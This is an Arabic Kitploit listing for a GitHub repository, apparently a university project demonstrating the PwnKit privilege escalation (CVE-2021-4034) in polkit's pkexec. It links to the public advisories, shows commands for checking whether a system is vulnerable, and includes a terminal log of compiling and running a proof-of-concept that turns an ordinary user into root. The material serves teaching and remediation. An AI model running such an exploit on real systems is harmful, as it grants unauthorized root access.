Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PwnKit-Local-Privilege-Escalation-Vulnerability-Discovered-in-polkit-s-pkexec-CVE-2021-4034 — دورة جامعية حول ثغرات البرمجيات وسبل التخفيف منها، لعرض كيفية استغلال هذه الثغرة ومعالجتها. | Kitploit
أدوات/GitHubGitHub/milad-rafie/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkit-s-pkexec-cve-2021-4034
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليماستغلال الملفات الثنائيةمختبرات وتدريب عملي
GitHubmilad-rafie/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkit-s-pkexec-cve-2021-4034

PwnKit-Local-Privilege-Escalation-Vulnerability-Discovered-in-polkit-s-pkexec-CVE-2021-4034

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

دورة جامعية حول ثغرات البرمجيات وسبل التخفيف منها، لعرض كيفية استغلال هذه الثغرة ومعالجتها.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

PwnKit - ثغرة تصعيد الامتيازات المحلية المكتشفة في pkexec الخاص بـ polkit - CVE-2021-4034-

مشروع جامعي حول الثغرات البرمجية والتخفيف منها، لإظهار الاستغلال والمعالجة الناتجة عن هذه الثغرة. استخدمنا في هذه التجربة نظام Ubunto الإصدار 16.04 LTS، بالإضافة إلى Debian 10.1.0، وهو ما سيتم عرضه في التجربة. كان إعداد البيئة أمرًا ضروريًا، حيث تحتاج دائمًا إلى التحقق من الإصدار الذي تعمل عليه للتأكد من كونه معرضًا للثغرة أم لا. الأوامر المستخدمة للتحقق: dpkg -l | grep polkit, pkexec --version

CVE-2021-4034

PoC لـ PwnKit: ثغرة تصعيد الامتيازات المحلية في pkexec الخاص بـ polkit (CVE-2021-4034)

https://seclists.org/oss-sec/2022/q1/80
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

PoC

تم التحقق على Debian 10 وUbunto 16.0.4

root@kitploit:~
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
تنزيل الأداة